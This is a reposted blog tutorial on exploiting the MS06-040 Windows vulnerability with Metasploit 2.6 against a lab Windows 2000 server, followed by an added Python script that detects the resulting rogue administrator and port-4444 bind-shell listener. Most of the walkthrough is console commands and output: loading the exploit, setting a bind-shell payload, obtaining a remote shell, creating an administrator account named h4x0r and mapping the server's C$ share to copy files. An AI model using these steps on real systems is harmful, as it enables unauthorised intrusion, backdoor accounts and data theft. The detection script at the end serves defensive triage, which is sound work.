How to Exploit MS06-040 [all credit goes to http://www.linickx.com, who wrote the whole guide!]
This is a repost of the full article for my readers:
[...]
[Do] you know how easy it actually is?
Myth Number 1: You need to be Linux literate to hack. It is true that many hacking tools are built for *nix, and many will say they are the best (heck, I’m using Linux now, so I’m not going to argue!), but many tools have been ported to Windows (or Mac if you prefer), and if you think your average help-desk junkie is fairly Windows literate, how difficult is it to point & click? Are you concerned yet?
Myth Number 2: Hacking is hard. Proper hacking, finding exploits in code, yes. But what the public means by hacking, like copying files off your PC, no. I’m going to show you how to use a Windows PC to hack a vulnerable server and create an administrator account which will allow you to copy the contents of the server’s hard drive.
OK, so “exploit in the wild” means a popular hacking website has published a working exploit; in the case of MS06-040, Milw0rm did, here. What made this exploit interesting is that it was published as a module for the popular pen-testing tool Metasploit, which, yep, you guessed it, runs on Windows!
So to get started, download and install Metasploit (I’ll be using Framework 2.6).
See my previous post “Hacking – MS06-040 Metasploit Download!!“
Once that’s installed you’ll need to update it with the latest available exploits, so click start -> metasploit framework -> msfupdate and watch it do its thing (Linux or Mac people: run msfupdate -u). During the update you’ll see that it downloads netapi_ms06_040.pm. In the Windows world you have to be quick, as the window closes when it’s finished updating, but Linux users will be able to see it: this is the exploit as published on Milw0rm, packaged as a Framework module.
Intrigued? Follow the white rabbit—>
Now there is a web GUI to Metasploit Framework, but (i) I didn’t find it that easy to use and (ii) it’s quite difficult to write an article saying point & click, so to hack (and I use the term loosely) we’re going to use the console, which is a little like a router console: a limited set of commands, not as overwhelming as a full command shell/terminal. So Windows users: start -> metasploit framework -> msfconsole (Mac & Linux, just type msfconsole), and you’ll get a black box that looks a little like this:
    [Metasploit ASCII-art banner]

    + -- --=[ msfconsole v2.6 [153 exploits - 76 payloads]

    msf >

So to get started, you can just type help to see a list of commands:
    msf > help

    Metasploit Framework Main Console Help
    ======================================

        ?           Show the main console help
        cd          Change working directory
        exit        Exit the console
        help        Show the main console help
        info        Display detailed exploit or payload information
        quit        Exit the console
        reload      Reload exploits and payloads
        save        Save configuration to disk
        setg        Set a global environment variable
        show        Show available exploits and payloads
        unsetg      Remove a global environment variable
        use         Select an exploit by name
        version     Show console version

show exploits will give a list of available exploits, and we want netapi_ms06_040, so type use netapi_ms06_040; notice how the prompt has changed:
    msf > use netapi_ms06_040
    msf netapi_ms06_040 >

Right, the next thing you need is something to attack. I’ve got a Windows 2000 Server SP4 box waiting with an IP address of 192.168.10.121, so to tell Metasploit what to attack you need to set a remote host variable. For the unfamiliar, a variable is a word that represents something (I’m not a programmer, so sorry for the crap definition), so we’re gonna set the word RHOST to 192.168.10.121:

    msf netapi_ms06_040 > set RHOST 192.168.10.121
    RHOST -> 192.168.10.121
    msf netapi_ms06_040 >

The final thing to do is to set up a payload. A payload is what you want to happen after you’ve exploited; show payloads lists them:
    msf netapi_ms06_040 > show payloads

    Metasploit Framework Usable Payloads
    ====================================

      win32_adduser                 Windows Execute net user /ADD
      win32_bind                    Windows Bind Shell
      win32_bind_dllinject          Windows Bind DLL Inject
      win32_bind_meterpreter        Windows Bind Meterpreter DLL Inject
      win32_bind_stg                Windows Staged Bind Shell
      win32_bind_stg_upexec         Windows Staged Bind Upload/Execute
      win32_bind_vncinject          Windows Bind VNC Server DLL Inject
      win32_downloadexec            Windows Executable Download and Execute
      win32_exec                    Windows Execute Command
      win32_reverse                 Windows Reverse Shell
      win32_reverse_dllinject       Windows Reverse DLL Inject
      win32_reverse_meterpreter     Windows Reverse Meterpreter DLL Inject
      win32_reverse_ord             Windows Staged Reverse Ordinal Shell
      win32_reverse_ord_vncinject   Windows Reverse Ordinal VNC Server Inject
      win32_reverse_stg             Windows Staged Reverse Shell
      win32_reverse_stg_upexec      Windows Staged Reverse Upload/Execute
      win32_reverse_vncinject       Windows Reverse VNC Server Inject

This gives a nice list of what’s available, anything from command shells to full VNC GUIs. I’m going to pick the simplest, which is win32_bind: when successful, this will turn our Metasploit console into a command prompt (start -> run -> cmd.exe) on the attacked machine, thus allowing us to run any commands we like!

    msf netapi_ms06_040 > set PAYLOAD win32_bind
    PAYLOAD -> win32_bind
    msf netapi_ms06_040(win32_bind) >

Before we go any further it’s best to check we’ve got everything; the show options command is massively useful because it shows us what settings (or variables) we need before an exploit will work.
    msf netapi_ms06_040(win32_bind) > show options

    Exploit and Payload Options
    ===========================

      Exploit:    Name       Default          Description
      --------    -------    --------------   ---------------------------------------
      required    RHOST      192.168.10.121   The target address
      optional    SMBDOM                      The domain for specified SMB username
      optional    SMBUSER                     The SMB username to connect with
      optional    SMBPASS                     The password for specified SMB username

      Payload:    Name       Default   Description
      --------    --------   -------   ------------------------------------------
      required    EXITFUNC   thread    Exit technique: "process", "thread", "seh"
      required    LPORT      4444      Listening port for bind shell

      Target: (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)

    msf netapi_ms06_040(win32_bind) >

As you can see we set the required RHOST, the others are optional (so we’ll ignore them), and the remaining required values have been filled in for us with defaults. Note what LPORT means for a bind payload: the shell listens on TCP port 4444 on the target itself and Metasploit connects in to it, so a host firewall that blocks inbound connections to 4444 will leave you with a successful overflow but no shell (the reverse payloads exist for exactly that case).
So the final touch is to hack! Type exploit:
    msf netapi_ms06_040(win32_bind) > exploit
    [*] Starting Bind Handler.
    [*] Detected a Windows 2000 target
    [*] Sending request...
    [*] Got connection from 192.168.10.119:45064 <-> 192.168.10.121:4444

    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    C:\WINNT\system32>

Success! (Pat yourself on the back!) You now have a working command line. Now if you’re not that literate with the Windows command line you may think, so what!?!? Well take a look at the following: we’ll set up a user called h4x0r with the password P455w0rd and add him/her to the Administrators group:

    C:\WINNT\system32>net user h4x0r P455w0rd /add
    net user h4x0r P455w0rd /add
    The command completed successfully.

    C:\WINNT\system32>net localgroup administrators h4x0r /add
    net localgroup administrators h4x0r /add
    The command completed successfully.

    C:\WINNT\system32>net localgroup administrators
    net localgroup administrators
    Alias name     administrators
    Comment        Administrators have complete and unrestricted access to the computer/domain

    Members

    -------------------------------------------------------------------------------
    Administrator
    h4x0r
    The command completed successfully.

    C:\WINNT\system32>

(Each command appears twice because the bind shell echoes what you typed before the output.) Now we have an administrator on that machine we can pretty much do what we like, so you Windows users can map the server’s hidden administrative share C$ as a network drive and copy & read any file you like. So from your PC where Metasploit is installed click start -> run, type cmd.exe (notice how the shell looks the same as the Metasploit one?) and type:

    net use x: \\192.168.10.121\c$ P455w0rd /user:h4x0r

Finally, Windows people, under “My Computer” on your machine you now have an “X” drive that is the C: drive of the server you attacked! (Linux users, you’ll have to use Samba’s smbclient to do the same; sorry Mac’ers, I don’t know for you!)
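The walkthrough above leaves two artefacts on the victim that a defender can look for with the same built-in tools the attacker used: an extra member of the local Administrators group (from net localgroup administrators) and a listener on the win32_bind LPORT, 4444 by default, with an established connection from the attacker’s box (from netstat -an). The script below is an added example, not part of the original article or of Metasploit; the console output it parses is constructed to match the shapes shown above, and the baseline of expected administrators and listening ports is an assumption you would replace with your own inventory.

```python
"""Triage the two artefacts the MS06-040 walkthrough leaves behind:
an unexpected local administrator and a bind-shell listener on LPORT.

Added example, not part of the original article. The console output is
constructed to match the shapes shown above (``net localgroup administrators``
and ``netstat -an`` on Windows 2000); the allow-lists are assumptions.
"""
import re

# Constructed sample: ``net localgroup administrators`` after the attacker
# added h4x0r, exactly as the walkthrough shows it.
NET_LOCALGROUP_OUTPUT = """\
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
h4x0r
The command completed successfully.
"""

# Constructed sample: ``netstat -an`` with the win32_bind listener on the
# default LPORT 4444 next to the normal RPC/SMB listeners, plus the
# attacker's established connection (192.168.10.119 in the walkthrough).
NETSTAT_OUTPUT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING
  TCP    192.168.10.121:139     0.0.0.0:0              LISTENING
  TCP    192.168.10.121:4444    192.168.10.119:45064   ESTABLISHED
  UDP    0.0.0.0:445            *:*
"""

# Assumed baselines: accounts allowed in the local Administrators group and
# TCP ports this server is expected to listen on. Replace with your inventory.
EXPECTED_ADMINS = frozenset({"Administrator"})
EXPECTED_LISTEN_PORTS = frozenset({135, 139, 445})


def parse_localgroup_members(output):
    """Return the member names listed by ``net localgroup <group>``.

    Members sit between the dashed separator and the trailing
    'The command completed successfully.' line; blank lines are skipped.
    """
    lines = output.splitlines()
    try:
        start = next(i for i, line in enumerate(lines) if line.startswith("----"))
    except StopIteration:
        raise ValueError("no member separator found; is this net localgroup output?")
    members = []
    for line in lines[start + 1:]:
        line = line.strip()
        if not line:
            continue
        if line.startswith("The command completed"):
            break
        members.append(line)
    return members


def unexpected_admins(output, expected=EXPECTED_ADMINS):
    """Members of the Administrators group that are not on the baseline."""
    allowed = {name.lower() for name in expected}
    return [m for m in parse_localgroup_members(output) if m.lower() not in allowed]


# One TCP row of ``netstat -an``: proto, local ip:port, foreign endpoint, state.
_NETSTAT_TCP = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+)\s+(\w+)\s*$")


def parse_netstat_tcp(output):
    """Return (local_ip, local_port, foreign, state) for each TCP row."""
    rows = []
    for line in output.splitlines():
        m = _NETSTAT_TCP.match(line)
        if m:
            rows.append((m.group(1), int(m.group(2)), m.group(3), m.group(4)))
    return rows


def unexpected_listeners(output, expected_ports=EXPECTED_LISTEN_PORTS):
    """Listening TCP ports not in the baseline, e.g. the win32_bind default 4444."""
    return sorted({port for _, port, _, state in parse_netstat_tcp(output)
                   if state == "LISTENING" and port not in expected_ports})


def established_on(output, port):
    """Remote endpoints connected to ``port``: the attacker's end of a bind shell."""
    return [foreign for _, lport, foreign, state in parse_netstat_tcp(output)
            if lport == port and state == "ESTABLISHED"]


if __name__ == "__main__":
    print("unexpected admins:", unexpected_admins(NET_LOCALGROUP_OUTPUT))
    for port in unexpected_listeners(NETSTAT_OUTPUT):
        print("unexpected listener on", port,
              "peers:", established_on(NETSTAT_OUTPUT, port))
```

Run it against the real output of the two commands captured from the suspect host (or pasted into the constants) and it flags h4x0r and the 4444 listener with its 192.168.10.119 peer. Remember that 4444 is only the default: an attacker can set LPORT to anything, which is why the check is an allow-list of expected ports rather than a search for one known-bad port.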
Many, many thanks to www.linickx.com for such a beautifully written and easy to follow “How To” on the latest MS security threat. Keep this knowledge free and we might just one day have a secure Windows OS. I’m just kidding, that’ll never happen. However, people will start regularly running Windows Update.
*Disclaimer/Warning – This post is for people to study the possible vulnerabilities of the Windows OS. It is NOT intended to act as a guideline for those that would use these security testing tools maliciously. WARNING: DO NOT UTILIZE THIS EXPLOIT FOR ANY OTHER REASON THAN TO TEST OS SECURITY IN A COMPLETE STAND ALONE ENVIRONMENT, I WILL NOT BE HELD RESPONSIBLE FOR THE ACTIONS OF THOSE THAT USE THIS INFORMATION TO BREAK THE LAW.
I’m glad you liked it! Thanks for the appropriate credits. I found your final remark “we might just one day have a secure Windows OS. I’m just kidding, that’ll never happen” very funny – lol!!!!
We’ll never have any completely secure OS. Linux isn’t more secure than Windows, it’s just less focused on by hackers.